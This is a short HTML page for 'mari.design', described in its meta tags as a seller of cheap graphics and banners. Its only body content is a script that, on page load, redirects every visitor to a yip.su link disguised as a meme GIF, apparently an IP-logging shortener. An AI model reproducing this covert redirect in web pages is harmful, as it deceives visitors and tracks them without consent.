<!DOCTYPE html>
<html lang="en">
<head>
    <title>mari.design</title>
    <meta property="og:image" content="http://satana.design/assets/img/palette-solid.png">
    <link rel="shortcut icon" href="http://satana.design/assets/img/palette-solid.png">
    <link rel="shortcut icon" type="image/png" href="http://satana.design/assets/img/palette-solid.png">
    <meta name="keywords" content="Design, Designs, Graphic Design, GFX, Cheap Graphics, Cheap Logos, Cheap Banners, Youtube Banner, Twitch Banner, Free Graphics">
    <meta name="name" content="">
    <meta name="description" content="mari.design is a company that was made for the purpose of selling high-quality, but cheap graphics.">  
</head>
<body>
    <script type="text/javascript">
        window.location.href = "https://yip.su/pepe-frown-meme.gif";
    </script>
</body>
</html>
